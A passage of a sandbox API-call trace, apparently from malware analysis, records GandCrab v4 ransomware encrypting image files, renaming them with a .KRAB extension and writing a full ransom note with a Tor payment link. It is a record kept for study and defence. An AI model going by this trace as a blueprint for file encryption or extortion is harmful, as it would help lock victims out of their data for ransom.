(lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg") returned 68 [0097.569] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg") returned 68 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="desktop.ini") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="autorun.inf") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="ntuser.dat") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="iconcache.db") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="bootsect.bak") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="boot.ini") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="ntuser.dat.log") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="thumbs.db") returned -1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="ntldr") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="NTDETECT.COM") returned 1 [0097.569] lstrcmpiW (lpString1="S15WT4gPHEGLk.jpg", lpString2="Bootfont.bin") returned 1 [0097.569] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.569] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10113d0) returned 1 [0097.570] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.570] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.570] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.570] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.570] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.570] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.571] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.571] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.571] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.571] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.571] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.571] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.571] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.572] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.572] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.572] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.572] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.572] GetLastError () returned 0x0 [0097.572] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.572] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.572] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011678) returned 1 [0097.572] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.573] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.573] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.573] GetLastError () returned 0x0 [0097.573] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.573] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.573] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\s15wt4gpheglk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.573] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.573] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.574] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x9d68, lpOverlapped=0x0) returned 1 [0097.585] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff6298, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.585] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x9d68, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x9d68, lpOverlapped=0x0) returned 1 [0097.585] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.585] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.588] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.588] CloseHandle (hObject=0x3a8) returned 1 [0097.588] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.589] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\s15wt4gpheglk.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\s15wt4gpheglk.jpg.krab")) returned 1 [0097.589] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.589] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.589] lstrcmpW (lpString1="TM_2G.gif", lpString2=".") returned 1 [0097.589] lstrcmpW (lpString1="TM_2G.gif", lpString2="..") returned 1 [0097.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="TM_2G.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif" [0097.589] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.590] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif.KRAB") returned 65 [0097.590] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif") returned 60 [0097.590] lstrlenW (lpString=".gif") returned 4 [0097.590] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.590] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.590] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.590] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif") returned 60 [0097.590] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif") returned 60 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="desktop.ini") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="autorun.inf") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="ntuser.dat") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="iconcache.db") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="bootsect.bak") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="boot.ini") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="ntuser.dat.log") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="thumbs.db") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="ntldr") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="NTDETECT.COM") returned 1 [0097.590] lstrcmpiW (lpString1="TM_2G.gif", lpString2="Bootfont.bin") returned 1 [0097.591] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.591] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0097.591] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.591] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.591] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.592] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.592] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.592] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.592] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0097.592] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.592] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.592] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.593] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.593] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.593] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.593] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10114e0) returned 1 [0097.593] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.593] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.593] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.593] GetLastError () returned 0x0 [0097.593] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.593] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0097.593] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.594] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.594] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.594] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.594] GetLastError () returned 0x0 [0097.594] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.594] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.594] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tm_2g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.595] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.605] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.605] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x1206b, lpOverlapped=0x0) returned 1 [0097.617] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffedf95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.617] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1206b, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x1206b, lpOverlapped=0x0) returned 1 [0097.617] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.618] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.620] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.621] CloseHandle (hObject=0x3a8) returned 1 [0097.621] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.621] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tm_2g.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TM_2G.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tm_2g.gif.krab")) returned 1 [0097.622] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.622] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.622] lstrcmpW (lpString1="TPxOHu-l", lpString2=".") returned 1 [0097.622] lstrcmpW (lpString1="TPxOHu-l", lpString2="..") returned 1 [0097.622] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="TPxOHu-l" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l" [0097.622] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\" [0097.622] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0097.622] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.622] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.622] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.622] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.622] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.622] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.623] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\\\KRAB-DECRYPT.txt") returned 77 [0097.623] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.623] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0097.623] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0097.624] CloseHandle (hObject=0x3a8) returned 1 [0097.624] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.624] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.624] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2c, wMilliseconds=0x331)) [0097.624] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.624] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 